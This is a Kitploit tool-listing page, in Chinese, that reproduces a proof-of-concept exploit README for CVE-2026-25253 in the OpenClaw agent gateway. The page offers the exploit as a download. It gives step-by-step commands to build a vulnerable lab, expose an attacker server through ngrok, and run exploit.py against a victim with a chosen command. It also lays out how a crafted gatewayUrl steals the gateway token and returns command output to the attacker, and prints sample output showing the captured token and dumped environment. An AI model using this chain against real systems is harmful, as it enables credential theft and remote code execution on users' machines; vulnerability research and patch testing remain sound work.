Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

订阅源联系隐私© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-25253 — OpenClaw 中 CVE-2026-25253 的概念验证漏洞利用:精心构造的 gatewayUrl 可窃取 Control UI 网关令牌,从而实现未经授权的网关访问和 1-click 远程代码执行。 | Kitploit
工具/GitHubGitHub/yym8538/cve-2026-25253
漏洞分析漏洞利用Web应用程序漏洞利用数据泄露Web安全渗透测试身份验证红队远程访问工具
GitHubyym8538/cve-2026-25253

CVE-2026-25253

OpenClaw 中 CVE-2026-25253 的概念验证漏洞利用:精心构造的 gatewayUrl 可窃取 Control UI 网关令牌,从而实现未经授权的网关访问和 1-click 远程代码执行。

11个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
分享

CVE-2026-25253 OpenClaw 一键 RCE

★ CVE-2026-25253 OpenClaw 一键远程代码执行 PoC ★

https://github.com/user-attachments/assets/e6957c61-7549-4e68-831e-a05436504a3e

描述

CVE-2026-25253 : OpenClaw 身份验证令牌窃取漏洞

描述:OpenClaw(又名 clawdbot 或 Moltbot)在 v2026.1.29 之前版本中,允许攻击者通过向 Control UI 提供特制的 gatewayUrl 查询字符串值来窃取存储的网关身份验证令牌,该 UI 会自动建立 WebSocket 连接,无需验证或用户确认。这可能导致未经授权的网关访问和 1 键远程代码执行。

要求

  • Docker(Windows 上为 Docker Desktop)
  • Python 3.x(攻击端)

文件

  • Dockerfile — 构建 OpenClaw 漏洞环境
  • templates/ — 漏洞利用所使用的恶意网页
  • config.txt — 受害者环境中使用的 OpenClaw 配置
  • exploit.py — 漏洞利用服务器
  • requirements.txt — PoC 依赖项

环境搭建

  1. 构建 Docker 镜像
docker build -t openclaw-vuln .
  1. 运行环境(Windows)
docker run -d --name openclaw-vuln -p 127.0.0.1:2222:22 openclaw-vuln
  1. 创建 SSH 隧道
ssh-keygen -R [127.0.0.1]:2222
ssh -N -L 18789:127.0.0.1:18789 -p 2222 [email protected]
  • 密码:openclawlab
  1. 访问 OpenClaw Control UI 在浏览器中打开以下 URL
http://127.0.0.1:18789/
  1. 输入网关令牌 d4b7c7689b82981ff86c735a9f8f616b310491b0d334659a1491c55a13353e66
  2. 点击 Connect
  3. 打开 Config 选项卡
  4. 粘贴 config.txt 的内容
  5. 将 API 密钥字段替换为你的 OpenAI API 密钥
  6. 保存配置
  7. 确认代理正常响应

概念验证(PoC)

  1. 安装依赖项(攻击端)
pip3 install -r requirements.txt
  1. 通过 HTTPS 暴露漏洞利用服务器
wget https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-linux-amd64.tgz
tar xzf ngrok-v3-stable-linux-amd64.tgz
./ngrok authtoken YOUR_TOKEN
./ngrok http 13337
  • 复制生成的转发主机名
  1. 运行漏洞利用服务器
python3 exploit.py --host YOUR_NGROK_HOSTNAME --command "env"

示例:

python3 exploit.py --host abcd-1234.ngrok-free.app --command "env"
  1. 触发攻击
  1. 打开漏洞利用服务器暴露的恶意页面
  2. 模拟受害者与页面的交互
  3. 从浏览器触发漏洞利用流程

攻击流程

  1. 恶意 URL 更改受害者的 Control UI gatewayUrl
  2. 浏览器自动连接到攻击者控制的 WebSocket 端点
  3. 网关身份验证令牌泄露给攻击者
  4. 恶意页面使用窃取的令牌向受害者本地 OpenClaw 网关打开新的 WebSocket 连接
  5. 通过代理发送命令执行请求
  6. 执行结果返回给攻击者服务器

预期结果

  • 受害者浏览器被重定向到恶意 WebSocket 流程中
  • 网关身份验证令牌被攻击者捕获
  • 攻击者可以通过 OpenClaw 发送命令执行请求
  • 命令输出返回给攻击者服务器

示例输出

[*] Exploit Server running on: abcd-1234.ngrok-free.app:13337
[*] Gateway token captured: d4b7c7689b82981ff86c735a9f8f616b310491b0d334659a1491c55a13353e66

==================================================
      [!] EXPLOIT RESULT CAPTURED [!]
==================================================
HOSTNAME=openclaw-vuln
PWD=/root
HOME=/root
...
==================================================

备注

  • 此 PoC 针对 OpenClaw 2026.1.24-1
  • 漏洞利用链依赖于 Control UI 中易受攻击的 gatewayUrl 处理
  • 对于远程受害者访问,恶意页面必须通过 HTTPS 提供服务
  • 本地 OpenClaw 网关通过受害者浏览器作为桥梁进行访问

EQST 洞察

我们每月发布一次 CVE 和恶意软件分析。如果您感兴趣,请通过以下链接查看我们的出版物。

  • KR : https://www.skshieldus.com/security-insights/reports/eqst_openclaw_rce_vulnerability
  • EN : https://www.skshieldus.com/en/report?tab=eqst
下载工具